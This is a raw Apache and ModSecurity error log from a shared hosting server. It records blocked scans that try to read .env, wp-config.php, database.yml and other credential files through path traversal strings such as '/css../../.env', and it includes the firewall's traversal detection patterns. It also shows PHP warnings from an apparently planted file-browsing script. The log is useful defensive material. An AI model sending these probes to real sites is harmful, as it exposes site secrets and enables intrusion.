[Tue May 12 05:23:17.186977 2026] [security2:error] [pid 1825287:tid 1825320] [client 45.148.10.238:28554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/html/.env"] [unique_id "agKdJQgpmE1yW0glLdgsgAAAAM8"]
[Tue May 12 05:23:17.187195 2026] [security2:error] [pid 1825287:tid 1825320] [client 45.148.10.238:28554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/html/.env"] [unique_id "agKdJQgpmE1yW0glLdgsgAAAAM8"]
[Tue May 12 05:23:17.200538 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.238:22072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc7PaAnTZtx1_H_wy1SAAAAUM"]
[Tue May 12 05:23:17.730173 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:23:20.438045 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:28584] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdKNr1yOh9Tvizezid2gAAAEA"]
[Tue May 12 05:23:20.438127 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:28584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdKNr1yOh9Tvizezid2gAAAEA"]
[Tue May 12 05:23:20.438297 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:28584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdKNr1yOh9Tvizezid2gAAAEA"]
[Tue May 12 05:23:20.441349 2026] [core:error] [pid 1825287:tid 1825308] [client 45.148.10.238:28592] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 05:23:20.444342 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:28596] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/public/.env"] [unique_id "agKdKBfeipD4uoG21FovOAAAAAI"]
[Tue May 12 05:23:20.444552 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:28596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/public/.env"] [unique_id "agKdKBfeipD4uoG21FovOAAAAAI"]
[Tue May 12 05:23:22.548642 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdD9r1yOh9TvizezidwQAAAE0"]
[Tue May 12 05:23:23.170252 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.238:57322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdGggpmE1yW0glLdgsbwAAAME"]
[Tue May 12 05:23:23.910963 2026] [access_compat:error] [pid 1808852:tid 1808869] [client 45.148.10.238:7520] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:23:23.921820 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:7534] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKdK81tk6y7yBJLpJo4YQAAAIY"]
[Tue May 12 05:23:23.922060 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:7534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKdK81tk6y7yBJLpJo4YQAAAIY"]
[Tue May 12 05:23:23.975932 2026] [security2:error] [pid 1844863:tid 1844888] [client 45.148.10.238:60910] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc9PaAnTZtx1_H_wy1TgAAAVM"]
[Tue May 12 05:23:24.225263 2026] [security2:error] [pid 1825179:tid 1825198] [client 43.156.55.246:37446] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/wp-content/uploads/2026/04/wog3-2.mp4"] [unique_id "agKdLNr1yOh9Tvizezid3AAAAEE"]
[Tue May 12 05:23:24.235614 2026] [security2:error] [pid 1842385:tid 1842412] [client 45.148.10.238:60926] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc9xs7kySIUZ3ORnIkqwAAARU"]
[Tue May 12 05:23:24.851077 2026] [security2:error] [pid 1825287:tid 1825316] [client 45.148.10.238:19836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdBwgpmE1yW0glLdgsYwAAAMs"]
PHP Warning:  filesize(): stat failed for /proc/30/task/30/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/30/task/30/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/30/task/30/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/30/task/30/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/30/task/30/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/30/task/30/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:23:25.765165 2026] [security2:error] [pid 1842385:tid 1842403] [client 45.148.10.238:60842] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc_Rs7kySIUZ3ORnIksAAAAQ0"]
[Tue May 12 05:23:27.020709 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:7546] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/www/.env"] [unique_id "agKdL9r1yOh9Tvizezid3gAAAFg"]
[Tue May 12 05:23:27.020990 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:7546] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/www/.env"] [unique_id "agKdL9r1yOh9Tvizezid3gAAAFg"]
[Tue May 12 05:23:27.024705 2026] [security2:error] [pid 1808852:tid 1808874] [client 45.148.10.238:7540] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdLxfeipD4uoG21FovPQAAABM"]
[Tue May 12 05:23:27.024910 2026] [security2:error] [pid 1808852:tid 1808874] [client 45.148.10.238:7540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdLxfeipD4uoG21FovPQAAABM"]
[Tue May 12 05:23:28.429678 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.238:21984] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc6BfeipD4uoG21Fou4gAAABc"]
[Tue May 12 05:23:28.608460 2026] [security2:error] [pid 1825287:tid 1825327] [client 45.148.10.238:22102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc7wgpmE1yW0glLdgsTwAAANU"]
[Tue May 12 05:23:30.742391 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.238:7554] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdMs1tk6y7yBJLpJo4agAAAIs"]
[Tue May 12 05:23:30.742621 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.238:7554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdMs1tk6y7yBJLpJo4agAAAIs"]
[Tue May 12 05:23:34.844610 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.238:33214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdDwgpmE1yW0glLdgsaQAAAMI"]
[Tue May 12 05:23:34.846150 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.238:60950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc-QgpmE1yW0glLdgsUwAAAMU"]
[Tue May 12 05:23:34.869577 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.238:7590] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdNhs7kySIUZ3ORnIk6QAAARE"]
[Tue May 12 05:23:34.869746 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.238:7590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdNhs7kySIUZ3ORnIk6QAAARE"]
[Tue May 12 05:23:35.488700 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/admin.php
[Tue May 12 05:23:35.616509 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/inputs.php
[Tue May 12 05:23:36.251065 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/file.php
[Tue May 12 05:23:36.376985 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/goods.php
[Tue May 12 05:23:36.504005 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/ms-edit.php
[Tue May 12 05:23:37.975202 2026] [security2:error] [pid 1842385:tid 1842402] [client 45.148.10.238:36056] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdORs7kySIUZ3ORnIk6gAAAQw"]
[Tue May 12 05:23:37.975298 2026] [security2:error] [pid 1842385:tid 1842402] [client 45.148.10.238:36056] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdORs7kySIUZ3ORnIk6gAAAQw"]
[Tue May 12 05:23:37.975473 2026] [security2:error] [pid 1842385:tid 1842402] [client 45.148.10.238:36056] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdORs7kySIUZ3ORnIk6gAAAQw"]
[Tue May 12 05:23:37.978983 2026] [security2:error] [pid 1844863:tid 1844870] [client 45.148.10.238:36062] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/_profiler/open"] [unique_id "agKdOfaAnTZtx1_H_wy1qgAAAUE"]
